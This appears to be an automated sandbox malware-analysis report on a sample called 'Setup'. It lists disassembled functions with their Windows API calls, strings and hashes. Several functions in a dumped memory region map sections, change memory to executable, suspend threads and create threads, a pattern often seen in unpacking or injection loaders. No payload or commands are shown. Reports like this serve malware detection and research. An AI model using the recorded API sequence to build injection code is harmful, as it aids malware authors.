String ID: Uirt$V)rt$Virt$lloc$ualA$ublA$va\D
API String ID: 2770133467-2059723026
Opcode ID: c8f73028636615da59b75463598fc9c97bc7a61fdea4b5f0cb3157890a83f151
Instruction ID: fc006040329bf6a9e0585ca97a97513e58c35ce2c966c46ca5bb135976c683dd
Opcode Fuzzy Hash: c8f73028636615da59b75463598fc9c97bc7a61fdea4b5f0cb3157890a83f151
Instruction Fuzzy Hash: AB82E2739147208FD748EF7EEC8616A37A2F7A0319346963FD41297166DF381D428A8D

Function 02FEDF71 Relevance: 12.7, APIs: 8, Instructions: 730memorynativethreadCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 02FEE00A
NtMapViewOfSection.NTDLL(?,00000000), ref: 02FEE0B2
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02FEE426
NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 02FEE4DB
VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 02FEE4F8
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 02FEE59B
VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 02FEE5CE
CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 02FEE73F

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID: Virtual$ProtectSection$CreateView$AllocThread
String ID:
API String ID: 1248616170-0
Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
Instruction ID: 0daf9c2a327eb805aeaabb39dd234cad79e6e2acc508e623a47cb778cddac371
Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
Instruction Fuzzy Hash: 6B429D71A08341AFDB25CF14DC44B6BBBE9EF88764F04492DFA969B251E730E844CB52

Function 02FA0AC1 Relevance: 6.1, APIs: 4, Instructions: 100
threadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,02FA0607,?,00000001,?,81EC8B55,000000FF), ref: 02FA0AFF
Thread32First.KERNEL32(00000000,0000001C), ref: 02FA0B2B
Wow64SuspendThread.KERNEL32(00000000), ref: 02FA0B7E
CloseHandle.KERNEL32(00000000), ref: 02FA0BA8

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
String ID:
API String ID: 1849706056-0
Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction ID: 4e01dd5fedbe051546b4fb8fb34018692103fcd3ef4426ab09f68236cd838ad6
Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction Fuzzy Hash: B5411BB1A00108AFDB18DF98C5A4BADB7B6EF88344F10C16CE615DB794DB34AE45CB54

Function 00431EBC Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 243
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(?,0004F300,?,-77B5E340,?,?,?,02B982F6), ref: 00431EF7

Strings

va\D, xrefs: 00431EC7
V)rt, xrefs: 00432077

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AllocVirtual
String ID: V)rt$va\D
API String ID: 4275171209-3196296120
Opcode ID: 17ff7b67e2fb85d96c19dc58d48e6f5552d99b93dcb1ce1ea18f77a78edb4c66
Instruction ID: 9762733a1d9119f7f98671894ee57d4e34ccb6e71bb48c27129854843cd490af
Opcode Fuzzy Hash: 17ff7b67e2fb85d96c19dc58d48e6f5552d99b93dcb1ce1ea18f77a78edb4c66
Instruction Fuzzy Hash: 65712573A153208FD748EFBFEC9606A3252FBE0308742953FE502D706ADE385942868D

Function 02FA0971 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 02FA0A3D

Strings

,, xrefs: 02FA0A89

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: ,
API String ID: 2422867632-3772416878
Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction ID: 53534f4531a0f8fbabe737d8e22912c26665de07de10802ba74ba9063ef43d23
Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction Fuzzy Hash: CD41B474E00209EFDB14CF98D9A4BAEB7B1FF48314F208198D516AB391D775AE81CB94

Function 02FA03B1 Relevance: 3.4, APIs: 2, Instructions: 399
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 02FA0654
TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02FA0948

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID: CreateProcessTerminateThread
String ID:
API String ID: 1197810419-0
Opcode ID: 8c410ce3e5f1c900720cfcfdef9fdd5aaf4a8e696a2258e8b2a14ab6fe4e76c1
Instruction ID: 472e3119fd558ee10ba0a3558b99dbff9f5ec0aff29659259db14aa29c75df96
Opcode Fuzzy Hash: 8c410ce3e5f1c900720cfcfdef9fdd5aaf4a8e696a2258e8b2a14ab6fe4e76c1
Instruction Fuzzy Hash: 4C12C2B5E00219DFDB14CF98D990BADBBB2FF88304F2482A9D615AB385C7356A41CF54

Function 00408570 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
Instruction ID: d3b8e551ebd18b966166ca098383beb9494d3946d3c482517005b7019d2e894c
Opcode Fuzzy Hash: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
Instruction Fuzzy Hash: EEE0D87170021467D711A95A9C869F7B35CA758314F00427FB949EB3C2EDB8DE8046ED

Function 00423B94 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424161,?,00000000,0042416C), ref: 00423BBE

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 48edabf631f81993959cac3a7e5f7459cd1392ebb1ce9be3f782214e3b303982
Instruction ID: 62037174fb3a4e63d39f4d80a9d1e591ad15120c94b51c82d4663250cb3dbf53
Opcode Fuzzy Hash: 48edabf631f81993959cac3a7e5f7459cd1392ebb1ce9be3f782214e3b303982
Instruction Fuzzy Hash: A0F0C579205608AFCB40DF9DC588D4AFBE8FB4C260B158295B988CB321C234FE808F94

Function 00431F28 Relevance: 1.5, Strings: 1, Instructions: 220COMMON

Download Yara Rule

Strings

V)rt, xrefs: 00432077

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID: V)rt
API String ID: 0-3000982620
Opcode ID: c2f3d7ddcff89f98ea47702279e4ffbf53b74d752268b70bdd710d9933999c63
Instruction ID: 78db0b6f9dccf6bef19b3b936cf3e558ddab275364cdf5cebed2a50231407212
Opcode Fuzzy Hash: c2f3d7ddcff89f98ea47702279e4ffbf53b74d752268b70bdd710d9933999c63
Instruction Fuzzy Hash: A8612532A157218FD748EF7EEC9606A3252FBE0318786953FE503D706ACF385846868D

Function 004320B0 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad6383069378a9d7145922cd72728936a1e6b8799ef82b913c9d8acdb0467311
Instruction ID: 7938731645180d1795806bc6635398e16622c076a3d24327fdf1eb6df801f918
Opcode Fuzzy Hash: ad6383069378a9d7145922cd72728936a1e6b8799ef82b913c9d8acdb0467311
Instruction Fuzzy Hash: 95310272A143108BE748EF7EEC9A0AA3253FBE0319745953FE603C706ACF345946868D

Function 00406334 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 26
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,00497288), ref: 0040633A
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497288), ref: 0040637E

Strings

SetDllDirectoryW, xrefs: 00406341
kernel32.dll, xrefs: 00406335
SetSearchPathMode, xrefs: 00406357
SetProcessDEPPolicy, xrefs: 0040636D

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressProc$HandleModulePolicyProcess
String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
API String ID: 3256987805-3653653586
Opcode ID: 175b991132f0397962604542a34d0212b3fd73ff26641444288f5514b5694858
Instruction ID: afe1bfd3dd2f0e9ffd17928c6800de4103a1c46ef747185b36a416b4cf2713bd
Opcode Fuzzy Hash: 175b991132f0397962604542a34d0212b3fd73ff26641444288f5514b5694858
Instruction Fuzzy Hash: E2E026A1380701ACEA1436F20D82F7B10488B40B64B2A14373D5AB91C3D9BDD92459BD

Function 00423884 Relevance: 15.1, APIs: 10, Instructions: 98
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041F3D4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2

GetClassInfoA.USER32(00400000,0042368C), ref: 004238AF
RegisterClassA.USER32(00498630), ref: 004238C7
GetSystemMetrics.USER32(00000000), ref: 004238E9
GetSystemMetrics.USER32(00000001), ref: 004238F8
SetWindowLongA.USER32(00410660,000000FC,0042369C), ref: 00423954
SendMessageA.USER32(00410660,00000080,00000001,00000000), ref: 00423975
GetSystemMenu.USER32(00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 00423980
DeleteMenu.USER32(00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 0042398F
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042399C
DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239B2

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
String ID:
API String ID: 183575631-0
Opcode ID: 49e735772f48ae54fcb5fe38930a04ff9474ea8db1f89588e4f946a5e3ff9012
Instruction ID: a1bb8b483c6051ae977dcd30bc5d6258be0549d98267ef4ab912faaf57b8e79c
Opcode Fuzzy Hash: 49e735772f48ae54fcb5fe38930a04ff9474ea8db1f89588e4f946a5e3ff9012
Instruction Fuzzy Hash: 463184B17402006AEB10BF65DC82F6636A89B15308F10017BFA40EF2D7CABDDD40876D

Function 004307B4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 23
registryclipboardthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegisterClipboardFormatA.USER32(commdlg_help), ref: 004307BC
RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 004307CB
GetCurrentThreadId.KERNEL32 ref: 004307E5
GlobalAddAtomA.KERNEL32(00000000), ref: 00430806

Strings

WndProcPtr%.8X%.8X, xrefs: 004307F7
commdlg_help, xrefs: 004307B7
commdlg_FindReplace, xrefs: 004307C6

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
API String ID: 4130936913-2943970505
Opcode ID: 286d819e49dc31bff7363ce272760638a3e9e634710abf7e83810de7db046942
Instruction ID: a6afac4a95f2c597deb8a3c09a724b63b9622156ea849986cff8ddd49ab29b56
Opcode Fuzzy Hash: 286d819e49dc31bff7363ce272760638a3e9e634710abf7e83810de7db046942
Instruction Fuzzy Hash: 68F082705583408ED700FB2588027197BE4EB98308F044A7FB498A62E1D77E8510CB9F

Function 0042369C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
OemToCharA.USER32(?,?), ref: 0042376C
CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC

Strings

2, xrefs: 004236FA
MAINICON, xrefs: 00423721

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Char$FileIconLoadLowerModuleName
String ID: 2$MAINICON
API String ID: 3935243913-3181700818
Opcode ID: 74ccb24d7ebd2ab93e1510b14834e5329cf565851bcf20c48a8ce73befd404fd
Instruction ID: 37f11e164b18fdaff452b8e89fdec3e7ced50b804c3530562fc3ce32e09f0af8
Opcode Fuzzy Hash: 74ccb24d7ebd2ab93e1510b14834e5329cf565851bcf20c48a8ce73befd404fd
Instruction Fuzzy Hash: BF319370A042549ADF10EF2988857C67BE8AF14308F4441BAE844DB393D7BED988CB95

Function 00418F48 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32(00000000), ref: 00418F4D
GlobalAddAtomA.KERNEL32(00000000), ref: 00418F6E
GetCurrentThreadId.KERNEL32 ref: 00418F89
GlobalAddAtomA.KERNEL32(00000000), ref: 00418FAA

Part of subcall function 004230D8: 73A1A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
Part of subcall function 004230D8: EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
Part of subcall function 004230D8: 73A24620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
Part of subcall function 004230D8: 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154

Part of subcall function 0042369C: LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
Part of subcall function 0042369C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
Part of subcall function 0042369C: OemToCharA.USER32(?,?), ref: 0042376C
Part of subcall function 0042369C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC

Part of subcall function 0041F128: GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
Part of subcall function 0041F128: SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
Part of subcall function 0041F128: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
Part of subcall function 0041F128: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D

Strings

ControlOfs%.8X%.8X, xrefs: 00418F9B
Delphi%.8X, xrefs: 00418F5F

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A24620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
String ID: ControlOfs%.8X%.8X$Delphi%.8X
API String ID: 3864787166-2767913252
Opcode ID: 4b1039f7c2ed13802eb740582532c433a8c58bd120a281f680ebe107a2bb77c7
Instruction ID: 8205fbe5be641bff71b9ea3a28b72145380c35a95610ff2efd46362842c0834c
Opcode Fuzzy Hash: 4b1039f7c2ed13802eb740582532c433a8c58bd120a281f680ebe107a2bb77c7
Instruction Fuzzy Hash: C1112EB06142409AC740FF76994268A7BE19B6431CF40943FF888EB2D1DB7D99548B5F

Function 004230D8 Relevance: 6.1, APIs: 4, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

73A1A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
73A24620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: A24620A480A570EnumFonts
String ID:
API String ID: 2630238358-0
Opcode ID: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
Instruction ID: 16e9332b6476af0d686f12fa818e5571f82757a24bc5219822a197079b30e1ec
Opcode Fuzzy Hash: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
Instruction Fuzzy Hash: D80192717447106AE710BF7A5C86B9B36649F04719F40427BF804AF2C7D6BE9C05476E

Function 00497270 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,0049727E), ref: 0040334B
Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,0049727E), ref: 00403356

Part of subcall function 00406334: GetModuleHandleA.KERNEL32(kernel32.dll,?,00497288), ref: 0040633A
Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
Part of subcall function 00406334: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497288), ref: 0040637E

Part of subcall function 00409B88: 6F5E1CD0.COMCTL32(00497292), ref: 00409B88

Part of subcall function 00410964: GetCurrentThreadId.KERNEL32 ref: 004109B2

Part of subcall function 00419050: GetVersion.KERNEL32(004972A6), ref: 00419050

Part of subcall function 0044EF98: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004972BA), ref: 0044EFD3
Part of subcall function 0044EF98: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9

Part of subcall function 0044F440: GetVersionExA.KERNEL32(0049A790,004972BF), ref: 0044F44F

Part of subcall function 00452860: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528F9,?,?,?,?,00000000,?,004972C9), ref: 00452880
Part of subcall function 00452860: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452886
Part of subcall function 00452860: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528F9,?,?,?,?,00000000,?,004972C9), ref: 0045289A
Part of subcall function 00452860: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004528A0

Part of subcall function 004563AC: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004563D0

Part of subcall function 00463E1C: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004972DD), ref: 00463E2B
Part of subcall function 00463E1C: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00463E31

Part of subcall function 0046BF68: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BF7D

Part of subcall function 0047783C: GetModuleHandleA.KERNEL32(kernel32.dll,?,004972E7), ref: 00477842
Part of subcall function 0047783C: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 0047784F
Part of subcall function 0047783C: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 0047785F

